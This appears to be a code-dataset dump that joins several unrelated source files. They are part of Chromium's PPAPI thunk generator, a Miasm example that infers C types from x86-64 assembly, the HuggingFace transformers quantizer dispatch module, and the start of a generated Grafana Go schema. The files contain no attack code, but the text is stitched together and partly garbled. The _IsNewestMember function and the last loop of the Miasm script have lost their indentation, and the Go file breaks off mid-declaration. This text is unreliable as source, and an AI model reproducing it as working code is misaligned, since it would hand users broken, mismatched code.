  body += 'return enter.functions()->%s(%s);' % (create_func,
                                                 arg_list)
  return body
def _GetOutputParams(member, release):
  """Returns output parameters (and their types) for a member function.

  Args:
    member - IDLNode for the member function
    release - Release to get output parameters for

  Returns:
    A list of name strings for all output parameters of the member
    function.
  """
  out_params = []
  callnode = member.GetOneOf('Callspec')
  if callnode:
    cgen = CGen()
    for param in callnode.GetListOf('Param'):
      mode = cgen.GetParamMode(param)
      if mode == 'out':
        # We use the 'store' mode when getting the parameter type, since we
        # need to call sizeof() for memset().
        _, pname, _, _ = cgen.GetComponents(param, release, 'store')
        out_params.append(pname)
  return out_params
def _MakeNormalMemberBody(filenode, release, node, member, rtype, args,
                          include_version, meta):
  """Returns the body of a typical function.

  Args:
    filenode - IDLNode for the file
    release - release to generate body for
    node - IDLNode for the interface
    member - IDLNode for the member function
    rtype - Return type for the member function
    args - List of 4-tuple arguments for the member function
    include_version - whether to include the version in the invocation
    meta - ThunkBodyMetadata for header hints

  Raises:
    TGenError: if rtype has no default failure value and the IDL supplies
        no on_failure attribute.
  """
  if len(args) == 0:
    # Calling into the "Shared" code for the interface seems like a reasonable
    # heuristic when we don't have any arguments; some thunk code follows this
    # convention today.
    meta.AddApi('ppapi/shared_impl/%s_shared.h' % _StripFileName(filenode))
    return 'return %s::%s();' % (_StripApiName(node.GetName()) + '_Shared',
                                 member.GetName())

  is_callback_func = args[len(args) - 1][0] == 'struct PP_CompletionCallback'
  if is_callback_func:
    # The raw callback argument is replaced by the tracked callback the
    # Enter object creates.
    call_args = args[:-1] + [('', 'enter.callback()', '', '')]
    meta.AddInclude('ppapi/c/pp_completion_callback.h')
  else:
    call_args = args

  if args[0][0] == 'PP_Instance':
    call_arglist = ', '.join(a[1] for a in call_args)
    function_container = 'functions'
  elif args[0][0] == 'PP_Resource':
    # The resource itself becomes the receiver, so it is dropped from the
    # forwarded argument list.
    call_arglist = ', '.join(a[1] for a in call_args[1:])
    function_container = 'object'
  else:
    # Calling into the "Shared" code for the interface seems like a reasonable
    # heuristic when the first argument isn't a PP_Instance or a PP_Resource;
    # some thunk code follows this convention today.
    meta.AddApi('ppapi/shared_impl/%s_shared.h' % _StripFileName(filenode))
    return 'return %s::%s(%s);' % (_StripApiName(node.GetName()) + '_Shared',
                                   member.GetName(),
                                   ', '.join(a[1] for a in args))

  function_name = member.GetName()
  if include_version:
    version = node.GetVersion(release).replace('.', '_')
    function_name += version

  invocation = 'enter.%s()->%s(%s)' % (function_container,
                                       function_name,
                                       call_arglist)

  # Errors are reported unless the IDL explicitly sets report_errors=False.
  handle_errors = not (member.GetProperty('report_errors') == 'False')
  out_params = _GetOutputParams(member, release)
  if is_callback_func:
    body = '%s\n' % _MakeEnterLine(filenode, node, member, args[0],
                                   handle_errors, args[len(args) - 1][1], meta)
    failure_value = member.GetProperty('on_failure')
    if failure_value is None:
      failure_value = 'enter.retval()'
    failure_return = 'return %s;' % failure_value
    success_return = 'return enter.SetResult(%s);' % invocation
  elif rtype == 'void':
    body = '%s\n' % _MakeEnterLine(filenode, node, member, args[0],
                                   handle_errors, None, meta)
    failure_return = 'return;'
    success_return = '%s;' % invocation  # We don't return anything for void.
  else:
    body = '%s\n' % _MakeEnterLine(filenode, node, member, args[0],
                                   handle_errors, None, meta)
    failure_value = member.GetProperty('on_failure')
    if failure_value is None:
      failure_value = _GetDefaultFailureValue(rtype)
    if failure_value is None:
      raise TGenError('There is no default value for rtype %s. '
                      'Maybe you should provide an on_failure attribute '
                      'in the IDL file.' % rtype)
    failure_return = 'return %s;' % failure_value
    success_return = 'return %s;' % invocation

  if member.GetProperty('always_set_output_parameters'):
    # Zero every out-parameter before returning failure so callers never
    # observe uninitialized memory.
    body += 'if (enter.failed()) {\n'
    for param in out_params:
      body += ' memset(%s, 0, sizeof(*%s));\n' % (param, param)
    body += ' %s\n' % failure_return
    body += '}\n'
    body += '%s' % success_return
    meta.AddBuiltinInclude('string.h')
  else:
    body += 'if (enter.failed())\n'
    body += ' %s\n' % failure_return
    body += '%s' % success_return
  return body
def DefineMember(filenode, node, member, release, include_version, meta):
  """Returns a definition for a member function of an interface.

  Args:
    filenode - IDLNode for the file
    node - IDLNode for the interface
    member - IDLNode for the member function
    release - release to generate
    include_version - include the version in emitted function name.
    meta - ThunkMetadata for header hints

  Returns:
    A string with the member definition.
  """
  cgen = CGen()
  rtype, name, arrays, args = cgen.GetComponents(member, release, 'return')
  log_body = '\"%s::%s()\";' % (node.GetName(),
                                cgen.GetStructName(member, release,
                                                   include_version))
  if len(log_body) > 69:  # Prevent lines over 80 characters.
    body = 'VLOG(4) <<\n'
    body += ' %s\n' % log_body
  else:
    body = 'VLOG(4) << %s\n' % log_body

  # Three body shapes: type checks (Is*), resource creation (Create*), and
  # everything else.
  if _IsTypeCheck(node, member, args):
    body += '%s\n' % _MakeEnterLine(filenode, node, member, args[0], False,
                                    None, meta)
    body += 'return PP_FromBool(enter.succeeded());'
  elif member.GetName() == 'Create' or member.GetName() == 'CreateTrusted':
    body += _MakeCreateMemberBody(node, member, args)
  else:
    body += _MakeNormalMemberBody(filenode, release, node, member, rtype, args,
                                  include_version, meta)

  signature = cgen.GetSignature(member, release, 'return', func_as_ptr=False,
                                include_version=include_version)
  return '%s\n%s\n}' % (cgen.Indent('%s {' % signature, tabs=0),
                        cgen.Indent(body, tabs=1))
def _IsNewestMember(member, members, releases):
"""Returns true if member is the newest node with its name in members.
Currently, every node in the AST only has one version. This means that we
will have two sibling nodes with the same name to represent different
versions.
See http://crbug.com/157017 .
Special handling is required for nodes which share their name with others,
but aren't the newest version in the IDL.
Args:
member - The member which is checked if it's newest
members - The list of members to inspect
releases - The set of releases to check for versions in.
"""
build_list = member.GetUniqueReleases(releases)
release = build_list[0] # Pick the oldest release.
same_name_siblings = filter(
lambda n: str(n) == str(member) and n != member, members)
for s in same_name_siblings:
sibling_build_list = s.GetUniqueReleases(releases)
sibling_release = sibling_build_list[0]
if sibling_release > release:
return False
return True
class TGen(GeneratorByFile):
  """Generator producing one C++ _thunk.cc file per IDL file."""

  def __init__(self):
    Generator.__init__(self, 'Thunk', 'tgen', 'Generate the C++ thunk.')

  def GenerateFile(self, filenode, releases, options):
    """Generates (or removes) the thunk file for one IDL file.

    Returns the result of IDLOutFile.Close() (whether the file changed),
    or False when nothing was generated.
    """
    savename = _GetThunkFileName(filenode, GetOption('thunkroot'))
    my_min, my_max = filenode.GetMinMax(releases)
    # Remove a previously generated thunk if the file falls entirely
    # outside of the requested release range.
    if my_min > releases[-1] or my_max < releases[0]:
      if os.path.isfile(savename):
        print "Removing stale %s for this range." % filenode.GetName()
        os.remove(os.path.realpath(savename))
      return False
    do_generate = filenode.GetProperty('generate_thunk')
    if not do_generate:
      return False
    thunk_out = IDLOutFile(savename)
    body, meta = self.GenerateBody(thunk_out, filenode, releases, options)
    # TODO(teravest): How do we handle repeated values?
    if filenode.GetProperty('thunk_include'):
      meta.AddInclude(filenode.GetProperty('thunk_include'))
    self.WriteHead(thunk_out, filenode, releases, options, meta)
    thunk_out.Write('\n\n'.join(body))
    self.WriteTail(thunk_out, filenode, releases, options)
    thunk_out.ClangFormat()
    return thunk_out.Close()

  def WriteHead(self, out, filenode, releases, options, meta):
    """Writes the copyright banner, includes and opening namespaces."""
    __pychecker__ = 'unusednames=options'
    cgen = CGen()
    cright_node = filenode.GetChildren()[0]
    assert(cright_node.IsA('Copyright'))
    out.Write('%s\n' % cgen.Copyright(cright_node, cpp_style=True))
    # Generate the "From ... modified ..." comment.
    from_text = 'From %s' % (
        filenode.GetProperty('NAME').replace(os.sep, '/'))
    modified_text = 'modified %s.' % (
        filenode.GetProperty('DATETIME'))
    out.Write('// %s %s\n\n' % (from_text, modified_text))
    # System headers (e.g. <string.h>) come before project headers.
    if meta.BuiltinIncludes():
      for include in sorted(meta.BuiltinIncludes()):
        out.Write('#include <%s>\n' % include)
      out.Write('\n')
    # TODO(teravest): Don't emit includes we don't need.
    includes = ['ppapi/c/pp_errors.h',
                'ppapi/shared_impl/tracked_callback.h',
                'ppapi/thunk/enter.h',
                'ppapi/thunk/ppapi_thunk_export.h']
    includes.append(_GetHeaderFileName(filenode))
    for api in meta.Apis():
      includes.append('%s' % api.lower())
    for i in meta.Includes():
      includes.append(i)
    for include in sorted(includes):
      out.Write('#include "%s"\n' % include)
    out.Write('\n')
    out.Write('namespace ppapi {\n')
    out.Write('namespace thunk {\n')
    out.Write('\n')
    out.Write('namespace {\n')
    out.Write('\n')

  def GenerateBody(self, out, filenode, releases, options):
    """Generates a member function lines to be written and metadata.

    Returns a tuple of (body, meta) where:
      body - a list of lines with member function bodies
      meta - a ThunkMetadata instance for hinting which headers are needed.
    """
    __pychecker__ = 'unusednames=options'
    out_members = []
    meta = ThunkBodyMetadata()
    for node in filenode.GetListOf('Interface'):
      # Skip if this node is not in this release
      if not node.InReleases(releases):
        print "Skipping %s" % node
        continue
      # Generate Member functions
      if node.IsA('Interface'):
        members = node.GetListOf('Member')
        for child in members:
          build_list = child.GetUniqueReleases(releases)
          # We have to filter out releases this node isn't in.
          build_list = filter(lambda r: child.InReleases([r]), build_list)
          if len(build_list) == 0:
            continue
          release = build_list[-1]
          # Older versions of a member get the version appended to their
          # generated function name.
          include_version = not _IsNewestMember(child, members, releases)
          member = DefineMember(filenode, node, child, release,
                                include_version, meta)
          if not member:
            continue
          out_members.append(member)
    return (out_members, meta)

  def WriteTail(self, out, filenode, releases, options):
    """Writes the per-version thunk structs and their Get*_Thunk accessors."""
    __pychecker__ = 'unusednames=options'
    cgen = CGen()
    version_list = []
    out.Write('\n\n')
    for node in filenode.GetListOf('Interface'):
      build_list = node.GetUniqueReleases(releases)
      for build in build_list:
        version = node.GetVersion(build).replace('.', '_')
        thunk_name = 'g_' + node.GetName().lower() + '_thunk_' + \
                     version
        thunk_type = '_'.join((node.GetName(), version))
        version_list.append((thunk_type, thunk_name))
        # Emit the interface struct initialized with the generated
        # per-member functions.
        out.Write('const %s %s = {\n' % (thunk_type, thunk_name))
        generated_functions = []
        members = node.GetListOf('Member')
        for child in members:
          rtype, name, arrays, args = cgen.GetComponents(
              child, build, 'return')
          if child.InReleases([build]):
            if not _IsNewestMember(child, members, releases):
              version = child.GetVersion(
                  child.first_release[build]).replace('.', '_')
              name += '_' + version
            generated_functions.append(name)
        out.Write(',\n'.join([' &%s' % f for f in generated_functions]))
        out.Write('\n};\n\n')
    out.Write('} // namespace\n')
    out.Write('\n')
    for thunk_type, thunk_name in version_list:
      out.Write('PPAPI_THUNK_EXPORT const %s* Get%s_Thunk() {\n' %
                (thunk_type, thunk_type))
      out.Write(' return &%s;\n' % thunk_name)
      out.Write('}\n')
      out.Write('\n')
    out.Write('} // namespace thunk\n')
    out.Write('} // namespace ppapi\n')
# Module-level generator instance; its constructor registers it under the
# 'tgen' option name with the generator framework.
tgen = TGen()


def Main(args):
  """Runs the generator self-test against the golden files in test_thunk/.

  Returns 0 when the generated thunks match the golden files, 1 otherwise.
  """
  # Default invocation will verify the golden files are unchanged.
  failed = 0
  if not args:
    args = ['--wnone', '--diff', '--test', '--thunkroot=.']
  ParseOptions(args)
  idldir = os.path.split(sys.argv[0])[0]
  idldir = os.path.join(idldir, 'test_thunk', '*.idl')
  filenames = glob.glob(idldir)
  ast = ParseFiles(filenames)
  if tgen.GenerateRange(ast, ['M13', 'M14', 'M15'], {}):
    print "Golden file for M13-M15 failed."
    failed = 1
  else:
    print "Golden file for M13-M15 passed."
  return failed


if __name__ == '__main__':
  sys.exit(Main(sys.argv[1:]))
"""
This example demonstrates the recovering of possible C types for an arbitrary
variable in an assembly code (the types are inferred from the function
argument types). It also displays the C code used to access this variable.
Input:
* definitions of the C types that can be used by the code
* layout of structures (packed/not packed)
* prototype of the analyzed function
Algorithm:
The DepGraph of the target variable is computed, which gives possible
expressions for this variable. For each DepGraph solution, if the expression
depends on typed arguments, the code infers the variable type and displays the C
code to access this variable.
Here be dragons:
For the moment, Miasm can infer C types (and generate C) for simple expressions.
To summarize, Miasm only supports accesses that do not involve arithmetic or
conditional expressions such as the following:
* var1.field
* var1[12][4]
* *(var1.field->tab[4])
Unsupported forms:
* var1 + var2
* var1[var2+4]
* var1?var2->field:6
In the following example, we have an explicit cast for "age", from uint16_t to
uint64_t, and for "height", from uint32_t to uint64_t. We are adding a naive
reduction rule to support such a cast.
First, in the type inference engine:
ExprCompose(int, 0) => int
Then, in the C generator:
ExprCompose(var1, 0) => var1
"""
from __future__ import print_function
import sys
from future.utils import viewitems, viewvalues
from miasm.analysis.machine import Machine
from miasm.analysis.binary import Container
from miasm.expression.expression import ExprOp, ExprCompose, ExprId, ExprInt
from miasm.analysis.depgraph import DependencyGraph
from miasm.arch.x86.ctype import CTypeAMD64_unk
from miasm.core.objc import ExprToAccessC, CHandler
from miasm.core.objc import CTypesManagerNotPacked
from miasm.core.ctypesmngr import CAstTypes, CTypePtr, CTypeStruct
from miasm.core.locationdb import LocationDB
def find_call(ircfg):
    """Yields (loc_key, index) pairs locating call assignments.

    For every IR block whose second-to-last AssignBlock contains a
    'call_func*' operation as a source, yields that block's loc_key and
    the index of the AssignBlock.
    """
    for irb in viewvalues(ircfg.blocks):
        out = set()
        if len(irb) < 2:
            continue
        # The call is expected in the penultimate AssignBlock of the block.
        assignblk = irb[-2]
        for src in viewvalues(assignblk):
            if not isinstance(src, ExprOp):
                continue
            if not src.op.startswith('call_func'):
                continue
            out.add((irb.loc_key, len(irb) - 2))
        # Skip blocks without exactly one call candidate.
        if len(out) != 1:
            continue
        loc_key, index = out.pop()
        yield loc_key, index
class MyExprToAccessC(ExprToAccessC):
    """Custom ExprToAccessC to complete expression translation to C."""

    def reduce_compose(self, node, **kwargs):
        """Custom reduction rule: {XXX, 0} -> XXX

        Strips a zero-extension compose (the naive cast rule described in
        the module docstring) so the inner access generates the C code.
        Returns None when the node is not a two-part compose ending in an
        integer 0, letting other rules apply.
        """
        if not (isinstance(node.expr, ExprCompose) and
                len(node.expr.args) == 2 and
                node.expr.args[1].is_int(0)):
            return None
        found = []
        for subcgenobj in node.args[0].info:
            found.append(subcgenobj)
        return found

    # Register the extra rule after the inherited ones; evaluated in order.
    reduction_rules = ExprToAccessC.reduction_rules + [reduce_compose]
def get_funcs_arg0(ctx, lifter_model_call, ircfg, lbl_head):
    """Compute DependencyGraph on the func @lbl_head.

    For every call site found in @ircfg, computes the dependency graph of
    the RSI register at that site and yields, for each DepGraph solution,
    the symbolic value RSI can take (expressed over the symbols in @ctx).
    """
    g_dep = DependencyGraph(ircfg, follow_call=False)
    # Track the second x86-64 SysV argument register (RSI).
    element = lifter_model_call.arch.regs.RSI

    for loc_key, index in find_call(ircfg):
        irb = ircfg.get_block(loc_key)
        instr = irb[index].instr
        print('Analysing references from:', hex(instr.offset), instr)
        g_list = g_dep.get(irb.loc_key, set([element]), index, set([lbl_head]))
        for dep in g_list:
            emul_result = dep.emul(lifter_model_call, ctx)
            value = emul_result[element]
            yield value
class MyCHandler(CHandler):
    """Custom CHandler to add complementary C handling rules"""
    # Swap in the compose-aware expression-to-C translator defined above
    exprToAccessC_cls = MyExprToAccessC
loc_db = LocationDB()

# Read the target binary given on the command line. Use a context manager so
# the file descriptor is closed deterministically (the original leaked it via
# open(...).read()).
with open(sys.argv[1], 'rb') as fdesc:
    data = fdesc.read()

# Digest C information
text = """
struct human {
unsigned short age;
unsigned int height;
char name[50];
};
struct ll_human {
struct ll_human* next;
struct human human;
};
"""

base_types = CTypeAMD64_unk()
types_ast = CAstTypes()
types_ast.add_c_decl(text)
types_mngr = CTypesManagerNotPacked(types_ast, base_types)

# Analyze binary
cont = Container.fallback_container(data, None, addr=0)
machine = Machine("x86_64")
dis_engine, lifter_model_call = machine.dis_engine, machine.lifter_model_call
mdis = dis_engine(cont.bin_stream, loc_db=loc_db)
addr_head = 0
asmcfg = mdis.dis_multiblock(addr_head)
lbl_head = loc_db.get_offset_location(addr_head)
lifter = lifter_model_call(loc_db)
ircfg = lifter.new_ircfg_from_asmcfg(asmcfg)

# Dump the IR flow graph; again close the file instead of leaking it
with open('graph_irflow.dot', 'w') as fdesc:
    fdesc.write(ircfg.dot())

# Main function's first argument's type is "struct ll_human*"
ptr_llhuman = types_mngr.get_objc(CTypePtr(CTypeStruct('ll_human')))
arg0 = ExprId('ptr', 64)
ctx = {lifter.arch.regs.RDI: arg0}
expr_types = {arg0: (ptr_llhuman,),
              ExprInt(0x8A, 64): (ptr_llhuman,)}
mychandler = MyCHandler(types_mngr, expr_types)
for expr in get_funcs_arg0(ctx, lifter, ircfg, lbl_head):
print("Access:", expr)
for c_str, ctype in mychandler.expr_to_c_and_types(expr):
print('\taccess:', c_str)
print('\tc type:', ctype) | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2024 The HuggingFace Inc. team. All rights reserved.
# Modifications Copyright (C) 2025, Advanced Micro Devices, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from ..models.auto.configuration_auto import AutoConfig
from ..utils import logging
from ..utils.quantization_config import (
AqlmConfig,
AutoRoundConfig,
AwqConfig,
BitNetQuantConfig,
BitsAndBytesConfig,
CompressedTensorsConfig,
EetqConfig,
FbgemmFp8Config,
FineGrainedFP8Config,
FPQuantConfig,
GPTQConfig,
HiggsConfig,
HqqConfig,
Mxfp4Config,
QuantizationConfigMixin,
QuantizationMethod,
QuantoConfig,
QuarkConfig,
SpQRConfig,
TorchAoConfig,
VptqConfig,
)
from .base import HfQuantizer
from .quantizer_aqlm import AqlmHfQuantizer
from .quantizer_auto_round import AutoRoundQuantizer
from .quantizer_awq import AwqQuantizer
from .quantizer_bitnet import BitNetHfQuantizer
from .quantizer_bnb_4bit import Bnb4BitHfQuantizer
from .quantizer_bnb_8bit import Bnb8BitHfQuantizer
from .quantizer_compressed_tensors import CompressedTensorsHfQuantizer
from .quantizer_eetq import EetqHfQuantizer
from .quantizer_fbgemm_fp8 import FbgemmFp8HfQuantizer
from .quantizer_finegrained_fp8 import FineGrainedFP8HfQuantizer
from .quantizer_fp_quant import FPQuantHfQuantizer
from .quantizer_gptq import GptqHfQuantizer
from .quantizer_higgs import HiggsHfQuantizer
from .quantizer_hqq import HqqHfQuantizer
from .quantizer_mxfp4 import Mxfp4HfQuantizer
from .quantizer_quanto import QuantoHfQuantizer
from .quantizer_quark import QuarkHfQuantizer
from .quantizer_spqr import SpQRHfQuantizer
from .quantizer_torchao import TorchAoHfQuantizer
from .quantizer_vptq import VptqHfQuantizer
# Maps a `quant_method` identifier to the HfQuantizer implementation that
# performs the actual (de)quantization work.
AUTO_QUANTIZER_MAPPING = {
    "awq": AwqQuantizer,
    "bitsandbytes_4bit": Bnb4BitHfQuantizer,
    "bitsandbytes_8bit": Bnb8BitHfQuantizer,
    "gptq": GptqHfQuantizer,
    "aqlm": AqlmHfQuantizer,
    "quanto": QuantoHfQuantizer,
    "quark": QuarkHfQuantizer,
    "fp_quant": FPQuantHfQuantizer,
    "eetq": EetqHfQuantizer,
    "higgs": HiggsHfQuantizer,
    "hqq": HqqHfQuantizer,
    "compressed-tensors": CompressedTensorsHfQuantizer,
    "fbgemm_fp8": FbgemmFp8HfQuantizer,
    "torchao": TorchAoHfQuantizer,
    "bitnet": BitNetHfQuantizer,
    "vptq": VptqHfQuantizer,
    "spqr": SpQRHfQuantizer,
    "fp8": FineGrainedFP8HfQuantizer,
    "auto-round": AutoRoundQuantizer,
    "mxfp4": Mxfp4HfQuantizer,
}
# Maps the same `quant_method` identifiers to their QuantizationConfig class.
# Kept key-for-key in sync with AUTO_QUANTIZER_MAPPING above; the bnb 4-bit
# and 8-bit methods share a single BitsAndBytesConfig.
AUTO_QUANTIZATION_CONFIG_MAPPING = {
    "awq": AwqConfig,
    "bitsandbytes_4bit": BitsAndBytesConfig,
    "bitsandbytes_8bit": BitsAndBytesConfig,
    "eetq": EetqConfig,
    "gptq": GPTQConfig,
    "aqlm": AqlmConfig,
    "quanto": QuantoConfig,
    "quark": QuarkConfig,
    "fp_quant": FPQuantConfig,
    "hqq": HqqConfig,
    "compressed-tensors": CompressedTensorsConfig,
    "fbgemm_fp8": FbgemmFp8Config,
    "higgs": HiggsConfig,
    "torchao": TorchAoConfig,
    "bitnet": BitNetQuantConfig,
    "vptq": VptqConfig,
    "spqr": SpQRConfig,
    "fp8": FineGrainedFP8Config,
    "auto-round": AutoRoundConfig,
    "mxfp4": Mxfp4Config,
}
logger = logging.get_logger(__name__)
class AutoQuantizationConfig:
    """
    The Auto-HF quantization config class that takes care of automatically dispatching to the correct
    quantization config given a quantization config stored in a dictionary.
    """

    @classmethod
    def from_dict(cls, quantization_config_dict: dict):
        """Instantiate the concrete config class from its serialized dict form.

        Raises:
            ValueError: if `quant_method` is missing or not registered.
        """
        quant_method = quantization_config_dict.get("quant_method")
        # We need a special care for bnb models to make sure everything is BC ..
        if quantization_config_dict.get("load_in_8bit", False) or quantization_config_dict.get("load_in_4bit", False):
            suffix = "_4bit" if quantization_config_dict.get("load_in_4bit", False) else "_8bit"
            quant_method = QuantizationMethod.BITS_AND_BYTES + suffix
        elif quant_method is None:
            raise ValueError(
                "The model's quantization config from the arguments has no `quant_method` attribute. Make sure that the model has been correctly quantized"
            )

        if quant_method not in AUTO_QUANTIZATION_CONFIG_MAPPING:
            # Report the keys of the mapping that was actually checked; the
            # original listed AUTO_QUANTIZER_MAPPING keys, which can diverge
            # from this mapping via register_quantization_config().
            raise ValueError(
                f"Unknown quantization type, got {quant_method} - supported types are:"
                f" {list(AUTO_QUANTIZATION_CONFIG_MAPPING.keys())}"
            )
        target_cls = AUTO_QUANTIZATION_CONFIG_MAPPING[quant_method]
        return target_cls.from_dict(quantization_config_dict)

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path, **kwargs):
        """Load the quantization config embedded in a pretrained model's config.

        Raises:
            ValueError: if the model config carries no `quantization_config`.
        """
        model_config = AutoConfig.from_pretrained(pretrained_model_name_or_path, **kwargs)
        if getattr(model_config, "quantization_config", None) is None:
            raise ValueError(
                f"Did not found a `quantization_config` in {pretrained_model_name_or_path}. Make sure that the model is correctly quantized."
            )
        quantization_config_dict = model_config.quantization_config
        quantization_config = cls.from_dict(quantization_config_dict)
        # Update with potential kwargs that are passed through from_pretrained.
        quantization_config.update(**kwargs)
        return quantization_config
class AutoHfQuantizer:
    """
    The Auto-HF quantizer class that takes care of automatically instantiating to the correct
    `HfQuantizer` given the `QuantizationConfig`.
    """

    @classmethod
    def from_config(cls, quantization_config: QuantizationConfigMixin | dict, **kwargs):
        """Instantiate the HfQuantizer registered for `quantization_config.quant_method`."""
        # Convert it to a QuantizationConfig if the q_config is a dict
        if isinstance(quantization_config, dict):
            quantization_config = AutoQuantizationConfig.from_dict(quantization_config)

        quant_method = quantization_config.quant_method

        # Again, we need a special care for bnb as we have a single quantization config
        # class for both 4-bit and 8-bit quantization
        if quant_method == QuantizationMethod.BITS_AND_BYTES:
            if quantization_config.load_in_8bit:
                quant_method += "_8bit"
            else:
                quant_method += "_4bit"

        if quant_method not in AUTO_QUANTIZER_MAPPING:
            raise ValueError(
                f"Unknown quantization type, got {quant_method} - supported types are:"
                f" {list(AUTO_QUANTIZER_MAPPING.keys())}"
            )

        target_cls = AUTO_QUANTIZER_MAPPING[quant_method]
        return target_cls(quantization_config, **kwargs)

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path, **kwargs):
        """Build the quantizer directly from a pretrained model's stored config."""
        quantization_config = AutoQuantizationConfig.from_pretrained(pretrained_model_name_or_path, **kwargs)
        return cls.from_config(quantization_config)

    @classmethod
    def merge_quantization_configs(
        cls,
        quantization_config: dict | QuantizationConfigMixin,
        quantization_config_from_args: QuantizationConfigMixin | None,
    ):
        """
        handles situations where both quantization_config from args and quantization_config from model config are present.
        """
        # The checkpoint's config wins; the args config may only contribute
        # loading-time attributes (see below)
        if quantization_config_from_args is not None:
            warning_msg = (
                "You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading"
                " already has a `quantization_config` attribute. The `quantization_config` from the model will be used."
            )
        else:
            warning_msg = ""

        if isinstance(quantization_config, dict):
            # Convert the config based on the type of quantization_config_from_args (e.g., AutoRoundConfig), which takes priority before automatic configuration dispatch.
            if isinstance(quantization_config_from_args, AutoRoundConfig):
                quantization_config = AutoRoundConfig.from_dict(quantization_config)
            else:
                quantization_config = AutoQuantizationConfig.from_dict(quantization_config)

        # Refuse to mix two different quantization schemes
        if (
            quantization_config_from_args is not None
            and quantization_config.__class__.__name__ != quantization_config_from_args.__class__.__name__
        ):
            raise ValueError(
                f"The model is quantized with {quantization_config.__class__.__name__} but you are passing a {quantization_config_from_args.__class__.__name__} config. "
                "Please make sure to pass the same quantization config class to `from_pretrained` with different loading attributes."
            )

        # These config classes expose loading-time attributes that users are
        # allowed to override from the `from_pretrained` arguments
        if (
            isinstance(
                quantization_config,
                (
                    GPTQConfig,
                    AwqConfig,
                    AutoRoundConfig,
                    FbgemmFp8Config,
                    CompressedTensorsConfig,
                    Mxfp4Config,
                    FineGrainedFP8Config,
                ),
            )
            and quantization_config_from_args is not None
        ):
            loading_attr_dict = quantization_config_from_args.get_loading_attributes()
            for attr, val in loading_attr_dict.items():
                setattr(quantization_config, attr, val)
            warning_msg += f"However, loading attributes (e.g. {list(loading_attr_dict.keys())}) will be overwritten with the one you passed to `from_pretrained`. The rest will be ignored."

        if warning_msg != "" and not isinstance(quantization_config, (Mxfp4Config, FineGrainedFP8Config)):
            warnings.warn(warning_msg)
        else:
            # in the case of mxfp4, we don't want to print the warning message, bit confusing for users
            logger.info(warning_msg)

        return quantization_config

    @staticmethod
    def supports_quant_method(quantization_config_dict):
        """Return True when the dict's `quant_method` maps to a known config class; warn and return False otherwise."""
        quant_method = quantization_config_dict.get("quant_method", None)
        if quantization_config_dict.get("load_in_8bit", False) or quantization_config_dict.get("load_in_4bit", False):
            suffix = "_4bit" if quantization_config_dict.get("load_in_4bit", False) else "_8bit"
            quant_method = QuantizationMethod.BITS_AND_BYTES + suffix
        elif quant_method is None:
            raise ValueError(
                "The model's quantization config from the arguments has no `quant_method` attribute. Make sure that the model has been correctly quantized"
            )

        if quant_method not in AUTO_QUANTIZATION_CONFIG_MAPPING:
            logger.warning(
                f"Unknown quantization type, got {quant_method} - supported types are:"
                f" {list(AUTO_QUANTIZER_MAPPING.keys())}. Hence, we will skip the quantization. "
                "To remove the warning, you can delete the quantization_config attribute in config.json"
            )
            return False
        return True
def register_quantization_config(method: str):
    """Decorator factory that registers a custom quantization configuration class under `method`."""

    def _decorator(cls):
        # Reject duplicate identifiers and classes outside the config hierarchy
        if method in AUTO_QUANTIZATION_CONFIG_MAPPING:
            raise ValueError(f"Config '{method}' already registered")
        if not issubclass(cls, QuantizationConfigMixin):
            raise TypeError("Config must extend QuantizationConfigMixin")
        AUTO_QUANTIZATION_CONFIG_MAPPING[method] = cls
        return cls

    return _decorator
def register_quantizer(name: str):
    """Decorator factory that registers a custom HfQuantizer subclass under `name`."""

    def _decorator(cls):
        # Reject duplicate identifiers and classes outside the quantizer hierarchy
        if name in AUTO_QUANTIZER_MAPPING:
            raise ValueError(f"Quantizer '{name}' already registered")
        if not issubclass(cls, HfQuantizer):
            raise TypeError("Quantizer must extend HfQuantizer")
        AUTO_QUANTIZER_MAPPING[name] = cls
        return cls

    return _decorator
def get_hf_quantizer(config, quantization_config, device_map, weights_only, user_agent):
    """Resolve the quantizer (if any) for a model load.

    Reconciles the quantization config stored in the checkpoint with the one
    passed as an argument, then returns the (possibly None) hf_quantizer plus
    the potentially updated config and device_map.
    """
    # A checkpoint-side quantization_config marks the model as pre-quantized,
    # unless its quant_method is unknown to this installation
    pre_quantized = hasattr(config, "quantization_config")
    if pre_quantized and not AutoHfQuantizer.supports_quant_method(config.quantization_config):
        pre_quantized = False

    if pre_quantized or quantization_config is not None:
        if pre_quantized:
            # Checkpoint config wins; args config may only override loading attrs
            config.quantization_config = AutoHfQuantizer.merge_quantization_configs(
                config.quantization_config, quantization_config
            )
        else:
            config.quantization_config = quantization_config

        hf_quantizer = AutoHfQuantizer.from_config(
            config.quantization_config,
            pre_quantized=pre_quantized,
        )
    else:
        hf_quantizer = None

    if hf_quantizer is not None:
        hf_quantizer.validate_environment(
            device_map=device_map,
            weights_only=weights_only,
        )
        # Let the quantizer adjust device placement and parallelism plans
        device_map = hf_quantizer.update_device_map(device_map)
        config = hf_quantizer.update_tp_plan(config)
        config = hf_quantizer.update_ep_plan(config)

        # In order to ensure popular quantization methods are supported. Can be disable with `disable_telemetry`
        if not getattr(hf_quantizer.quantization_config, "dequantize", False):
            quant_method = hf_quantizer.quantization_config.quant_method
            user_agent["quant"] = getattr(quant_method, "value", quant_method)

    return hf_quantizer, config, device_map | python | github | https://github.com/huggingface/transformers | src/transformers/quantizers/auto.py
//
// Code generated by grafana-app-sdk. DO NOT EDIT.
//
package v0alpha1
import (
"github.com/grafana/grafana-app-sdk/resource"
)
// schema is unexported to prevent accidental overwrites
var (
	// schemaDummy declares the Dummy kind (group historian.alerting.grafana.app,
	// version v0alpha1) as a namespaced resource with plural "dummys".
	schemaDummy = resource.NewSimpleSchema("historian.alerting.grafana.app", "v0alpha1", NewDummy(), &DummyList{}, resource.WithKind("Dummy"),
		resource.WithPlural("dummys"), resource.WithScope(resource.NamespacedScope))
	// kindDummy couples the schema with its wire codecs (JSON only).
